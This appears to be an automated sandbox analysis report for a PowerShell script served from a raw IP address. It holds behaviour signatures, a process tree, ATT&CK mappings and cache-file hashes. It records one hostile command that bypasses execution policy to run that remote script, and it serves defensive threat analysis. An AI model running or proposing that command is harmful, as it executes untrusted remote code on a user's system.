hxxp://159[.]223[.]10[.]199[:]8000/evmet[.]ps1

Analysis

max time kernel
36s
max time network
40s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
18/07/2023, 08:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://159.223.10.199:8000/evmet.ps1

Score

1^/10

Malware Config

Signatures

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1420546310-613437930-2990200354-1000\{1ACDD382-AF98-4D4F-BB23-6B40DC6A4259}	msedge.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1124	powershell.exe
408	msedge.exe
408	msedge.exe
4968	msedge.exe
4968	msedge.exe
4500	msedge.exe
4500	msedge.exe
2668	identity_helper.exe
2668	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs

pid	Process
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1124	powershell.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
1468	helppane.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1468	helppane.exe
1468	helppane.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1468 wrote to memory of 4968	1468	helppane.exe	96
PID 1468 wrote to memory of 4968	1468	helppane.exe	96
PID 4968 wrote to memory of 3960	4968	msedge.exe	97
PID 4968 wrote to memory of 3960	4968	msedge.exe	97
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 2544	4968	msedge.exe	99
PID 4968 wrote to memory of 408	4968	msedge.exe	98
PID 4968 wrote to memory of 408	4968	msedge.exe	98
PID 4968 wrote to memory of 2096	4968	msedge.exe	100
PID 4968 wrote to memory of 2096	4968	msedge.exe	100
PID 4968 wrote to memory of 2096	4968	msedge.exe	100
PID 4968 wrote to memory of 2096	4968	msedge.exe	100
PID 4968 wrote to memory of 2096	4968	msedge.exe	100
PID 4968 wrote to memory of 2096	4968	msedge.exe	100
PID 4968 wrote to memory of 2096	4968	msedge.exe	100
PID 4968 wrote to memory of 2096	4968	msedge.exe	100
PID 4968 wrote to memory of 2096	4968	msedge.exe	100
PID 4968 wrote to memory of 2096	4968	msedge.exe	100
PID 4968 wrote to memory of 2096	4968	msedge.exe	100
PID 4968 wrote to memory of 2096	4968	msedge.exe	100
PID 4968 wrote to memory of 2096	4968	msedge.exe	100
PID 4968 wrote to memory of 2096	4968	msedge.exe	100
PID 4968 wrote to memory of 2096	4968	msedge.exe	100
PID 4968 wrote to memory of 2096	4968	msedge.exe	100
PID 4968 wrote to memory of 2096	4968	msedge.exe	100
PID 4968 wrote to memory of 2096	4968	msedge.exe	100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File http://159.223.10.199:8000/evmet.ps1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1124

C:\Windows\helppane.exe
C:\Windows\helppane.exe -Embedding
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528882
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4968
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x7c,0x108,0x7ffb91aa46f8,0x7ffb91aa4708,0x7ffb91aa4718
    3⤵
    PID:3960
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:408
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
    3⤵
    PID:2544
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
    3⤵
    PID:2096
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
    3⤵
    PID:3564
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
    3⤵
    PID:2664
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
    3⤵
    PID:2492
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4512 /prefetch:1
    3⤵
    PID:4304
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4904 /prefetch:8
    3⤵
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:4500
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4912 /prefetch:8
    3⤵
    PID:4264
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4400 /prefetch:1
    3⤵
    PID:4216
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1
    3⤵
    PID:448
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
    3⤵
    PID:5264
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
    3⤵
    PID:5368
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
    3⤵
    PID:5408
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
    3⤵
    PID:5776
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1
    3⤵
    PID:5940
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
    3⤵
    PID:6064
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
    3⤵
    PID:5244
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5944 /prefetch:1
    3⤵
    PID:5904
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1
    3⤵
    PID:1464
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:1
    3⤵
    PID:480
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6540 /prefetch:8
    3⤵
    PID:2720
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6540 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2668
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:1
    3⤵
    PID:5848
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
    3⤵
    PID:5884
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1
    3⤵
    PID:5228

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1004

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4708

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fc99b0086d7714fd471ed4acc862ccc0

SHA1
39a3c43c97f778d67413a023d66e8e930d0e2314

SHA256
45ef01f81605bfd96126d5520c5aa0304c7fa7d5fdb3e4d5b2dd2bf84e2afd96

SHA512
c308fa3eda9235d67a506a5f058fefb9a769ec01d7b0d4f5a2397892cc4f8155301c55c1fac23bebacdd087ab3f47f1eacc9ff88eff4115a7d67aa7b1d6581a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

Filesize
22KB

MD5
68f3c668bd3369699a9e554c2294ff29

SHA1
b06cb70c310a429d5000361e3ab7bb07146b23f6

SHA256
392a288aaa8044b0344dc11b86a8291ec3ec7094f4efa773666e7048a5f98576

SHA512
49a67e794d300020df38d2ca7e2534dc13002949ed546460cafbde8ce653adeed8e77fa86215634ef2c462aa40e48c8832066837fa1104fca1764c1d17167012

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

Filesize
22KB

MD5
438d99fea4932ea1fc763b647853d1fb

SHA1
48c5c7d6c71ef140ed4c84cda82da40a76fcb579

SHA256
8bd123bedaa8734ca3ba2a6a16b462b045e5a6d1b6a4718b5ff495663e87ebcd

SHA512
4ce4110e865d87ab0cdc8e973cff53931f26e780eaab96eb923c20689ccc5f8f04d3ddf58de93180b78de8c6ee97424d66d64d8ff01a29a58e7bd3d44705445f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011

Filesize
30KB

MD5
01ed540a1edc0b1cae4b91ef5d576be3

SHA1
0f4aa0ea331348a4c2bca0f3898dd681646455c4

SHA256
da348028c4b581592016ee99ec4ee38cdaaac87d2c0317962c52c18a9338a101

SHA512
068128ccce22c4b9771e61db2126ffcac2407eeb036502b98feb89e20f8e0f32c35d475322f4ed6d5457832be47e0841b190c14651fef6f3a9bb91f6dc1561ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

Filesize
49KB

MD5
0888bb7879080ed7ef4877114adbcbd7

SHA1
569b99bf87b5e4bc7775ca1a2a31f17b67700934

SHA256
c4b89f81286722cbffd3a68691a45b11c6e71110c55de310a98a6c3227c07d18

SHA512
6604639d8dd7d01b8e86601e8a7bf87dfd5b24623049be9281c530548bbfdf5a0dc46cd8c186022d3fcae3e6b47f6bd5a49aa895e4050207c51a1ba50641df7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000013

Filesize
24KB

MD5
a2a5b10997fa665d4711538379d21aa0

SHA1
7f13e3156d1132232010dd74a5bef212d6c77cae

SHA256
db8ebb02340aa91a55b3f9025078c51d2bd59e6f1b469adca0b4f74b1532b7a8

SHA512
6dc933138ded551630ecd106d4c35cf06ab488a299cbb95a05652b5377af83ebbf5ec8c8c3b99842cde8f5f627af1c09cc38f9d5e213178be85e04017b60a9de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014

Filesize
85KB

MD5
68cdafbfc1f62d2dd0d588e8913943b5

SHA1
a04309c86b5d2ddaae92ff0cf15cc633531fa4b9

SHA256
c4ad786a7c72f962ca7948d192e88987db64186fa63d8cd0ba81657941265c5d

SHA512
393d8593049647157b111e2c1b453067e53c09595025ebf83d75dc42bcd1e3bced153071cb32eeb02998a9820db87b2eee92d97d4e4298ebe56e7ae5e03a342a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015

Filesize
35KB

MD5
b51cd25f5df4d2f99d876051922b0045

SHA1
474caa81e36b4e29dc87554bc8686c50a4fe859d

SHA256
65e4a299d4f422b828b239b8344d11289600c89745f05a2e36a9befb3179aca0

SHA512
1cd5900c27b1ba5bd43fa6d2bc5c874af7310b9e7444a381f7ec815b99145dbad83f4362d267649df8464f6289333e10a6557de1c9c7d837afc495fc047eb000

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016

Filesize
79KB

MD5
e51f388b62281af5b4a9193cce419941

SHA1
364f3d737462b7fd063107fe2c580fdb9781a45a

SHA256
348404a68791474349e35bd7d1980abcbf06db85132286e45ad4f204d10b5f2c

SHA512
1755816c26d013d7b610bab515200b0f1f2bd2be0c4a8a099c3f8aff2d898882fd3bcf1163d0378916f4c5c24222df5dd7b18df0c8e5bf2a0ebef891215f148e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017

Filesize
213KB

MD5
cc521a7256e94d43df24fc6ccf1cabc9

SHA1
783de4bf06ccd26af4eb56f6d8a7473a551c3135

SHA256
0e379b6c1a7940b9d0cb6277c2b30e71e228bdc4f80417e785dd1b54ce122662

SHA512
553268758ecca7a455f357bda6fdef344740f98c836e88096550c8ffecf3e3b7682f1a6c17eb0b6fb79ac8fbfae733cf9e1321c8da44e54b2aa882cf92eff5b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

Filesize
28KB

MD5
f04217f47619ac51664e7a65b3f77b48

SHA1
c32c07c33ba8850f282492b2bd38be170b556541

SHA256
5975dea100208142bb9cbd2ae15e1bae43213598a2a4496e42c4baec3bd50a61

SHA512
baee23291cbe16489213a42eda355edbc0db78a8fa8646388bfcc9cf07911e7833bc2af58d3150127f263679f1025c955de97c66d2072f82d8e433f6033fd6e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000019

Filesize
17KB

MD5
0cedbb5e7888349e4705a66ede3dd01c

SHA1
bff3c70dbd94c866bdefc48e7bba1d8f359577ac

SHA256
12d95d8d400eeafa0258e9d29d6ea5ef0ec9cfc1410b75e47976fcb3f92082b0

SHA512
02738acfac17a4f51eeff92f6fd001a4c874b077e3a31b079d9a3e84d551292a26a9d32ee2970c933acc716a785c843ea7abf51620c69251e7ee674a7ef28acd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001a

Filesize
58KB

MD5
d64e27c255582bfdf91a0031e15098fc

SHA1
efd8f560e9959483bf5b3ac2f32d45e706daac7c

SHA256
9aba33a3527ff6136556534082c289e8ad7d4428c3b79d3fae7c31e023a7b967

SHA512
cdc6d2656b9734bde82a2e7edbdcb4f6baae4cb447f0f7052090da822327aa1324907f2d789c4391cc342cdc483d499c1be981b8c74bf7322be05ed3795e5d4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001b

Filesize
25KB

MD5
d0263dc03be4c393a90bda733c57d6db

SHA1
8a032b6deab53a33234c735133b48518f8643b92

SHA256
22b4df5c33045b645cafa45b04685f4752e471a2e933bff5bf14324d87deee12

SHA512
9511bef269ae0797addf4cd6f2fec4ad0c4a4e06b3e5bf6138c7678a203022ac4818c7d446d154594504c947da3061030e82472d2708149c0709b1a070fdd0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001c

Filesize
23KB

MD5
83ee9cb183a0382a6b9ca0646dccd04b

SHA1
5d2760f85a7cc1c2ee226a39b0623271dbecf2bf

SHA256
190ad4090acc1e823f53b56a2bfd7088ddedea746b729d41426311916e722ff5

SHA512
481e47e047308d568d9fdeed7625e082819b51ea012e888e503ed7552780a83521ed63d9115b9f6a8d9e963a7d17072878fb389db2aa5b2efd8c2f17fe70b21e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001d

Filesize
176KB

MD5
9c80c2031558ed880204136988d91023

SHA1
51a71449bd0ccfeb45fa3e935b0be720e545ce26

SHA256
ef3c88944ac753a0ea2b356c9cb294b43d0619e9419589145bb481b09d9aa969

SHA512
3ffca1e446b1d223fa34c4dfb8e0a1a614be7feea1dbcefb349ae3f05e7f1d6bbbe12b1f6e7868eb7571fe9392d96cdec04a9f2a86fc9eb87ffad3f407780e14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

Filesize
256KB

MD5
6dfa4adb07e230eb92a44386cf37a260

SHA1
c739b1819ce71060b4d9fba1a6c5c93de6610ba6

SHA256
88cb61ce72cfc2b148c9d0e0da740c1164e01511347ff2f027aa3fea444c384b

SHA512
a2294edcbd2f0bf8689ab0ceb1ad201933803dccae8f245da9b7d4020e901e7a75a43526265fd66fc66fba9cc1774a5faed374acc819648c716f18e2b5778db7

Download Submit
